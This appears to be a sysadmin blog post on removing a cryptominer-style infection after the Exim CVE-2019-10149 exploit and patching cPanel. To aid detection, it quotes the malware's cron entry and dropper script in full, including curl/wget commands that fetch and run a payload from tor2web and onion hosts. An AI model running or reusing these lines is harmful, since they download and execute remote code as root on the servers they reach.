If you found some strange name process like [kthrotlds] running on your server, it
means your server could be affected by CVE-2019-10149 Exim security exploit. Of course process name can be different, first of all you need to kill it:

pkill -9 -f kthrotlds
ps aux | grep kthrotlds # To check if process still exists

Its binnary file created in /usr/bin/ directory:
/usr/bin/[kthrotlds]
ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped
You need quarantine it or just remove.

You can find TCP connection on this process, so its not kernel procesas like it would like to pretend in your process list.

While fixing this issue my advice is to stop crond service: service crond stop

Than you should find all files which could be affected:

grep -r passwd /var/spool/cron*

*/11 * * * * root tbin=$(command -v passwd); bpath=$(dirname “${tbin}”); curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi; wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “to ” && wget=”$f” && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i “.onion.”|wc -l) -ne 0 ]; then echo “127.0.0.1 localhost” > /etc/hosts >/dev/null 2>&1; fi; (${curl} -fsSLk –retry 2 –connect-timeout 22 –max-time 75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /.cache/.ntp||${curl} -fsSLk –retry 2 –connect-timeout 22 –max-time 75 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /.cache/.ntp||${curl} -fsSLk –retry 2 –connect-timeout 22 –max-time 75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /.cache/.ntp||${wget} –quiet –tries=2 –wait=5 –no-check-certificate –connect-timeout=22 –timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /.cache/.ntp||${wget} –quiet –tries=2 –wait=5 –no-check-certificate –connect-timeout=22 –timeout=75 https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /.cache/.ntp||${wget} –quiet –tries=2 –wait=5 –no-check-certificate –connect-timeout=22 –timeout=75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O /.cache/.ntp) && chmod +x /.cache/.ntp && /bin/sh /.cache/.ntp

You need to check /etc, /root, /usr/local/bin for bash/sh scripts with malware code, like:

#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
RHOST=”https://an7kmd2wp4xo7hpr”
TOR1=”.tor2web.su/”
TOR2=”.tor2web.io/”
TOR3=”.onion.sh/”
RPATH1=’src/ldm’
#LPATH=”${HOME-/tmp}/.cache/”
TIMEOUT=”75″
CTIMEOUT=”22″
COPTS=” -fsSLk –retry 2 –connect-timeout ${CTIMEOUT} –max-time ${TIMEOUT} ”
WOPTS=” –quiet –tries=2 –wait=5 –no-check-certificate –connect-timeout=${CTIMEOUT} –timeout=${TIMEOUT} ”
tbin=$(command -v passwd); bpath=$(dirname “${tbin}”)
curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi
wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “.wgetrc’-style command” && wget=”$f” && break; done; fi; fi
#CHKCURL=’curl=”curl “; wget=”wget “; if [ “$(whoami)” = “root” ]; then if [ $(command -v curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); fi; if [ -z ${curl} ]; then curl=”echo “; fi; if [ $(command -v wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi; if [ -z ${wget} ]; then wget=”echo “; fi; if [ $(cat /etc/hosts|grep -i “.onion.”|wc -l) -ne 0 ]; then echo “127.0.0.1 localhost” > /etc/hosts >/dev/null 2>&1; fi; fi; ‘
CHKCURL=’tbin=$(command -v passwd); bpath=$(dirname “${tbin}”); curl=”curl”; if [ $(curl –version 2>/dev/null|grep “curl “|wc -l) -eq 0 ]; then curl=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “CURLOPT_VERBOSE” && curl=”$f” && break; done; fi; fi; wget=”wget”; if [ $(wget –version 2>/dev/null|grep “wgetrc “|wc -l) -eq 0 ]; then wget=”echo”; if [ “${bpath}” != “” ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q “to ” && wget=”$f” && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i “.onion.”|wc -l) -ne 0 ]; then echo “127.0.0.1 localhost” > /etc/hosts >/dev/null 2>&1; fi; ‘
LBIN8=”kthrotlds”
null=’ >/dev/null 2>&1′

If its cPanel server, you need to check Exim version like this:

whmapi1 installed_versions packages=1|grep exim

exim: 4.91-4
– exim-4.91-4.cp1170.x86_64

or simple exim –version
Exim version 4.91 #1 built 06-Jun-2019 12:52:02

To patch WHM and Exsim, if you have older versions like v76 or v70. To check your WHM version:

whmapi1 installed_versions packages=1|grep whm
cpanel_and_whm: 11.78.0.27

It means 78.0.27

or
cpanel_and_whm: 11.80.0.14

It means 80.0.14

vi /etc/cpupdate.conf
CPANEL=11.76
RPMUP=daily
SARULESUP=daily
STAGING_DIR=/usr/local/cpanel
UPDATES=daily

Than:
/scripts/upcp

Than back:
vi /etc/cpupdate.conf
CPANEL=release
RPMUP=daily
SARULESUP=daily
STAGING_DIR=/usr/local/cpanel
UPDATES=daily

P.s. Also you need to check /root/.ssh/authorized_keys, /etc/cron.d, /etc/cron.daily, /etc/cron.weekly, /etc/cron.monthly and etc.

You can all modified file during last 5 days:
find /etc/ -mtime -5 -print

This malware script removes all your previous cron tasks, so you need to restore them from your backups and than enable cron service again.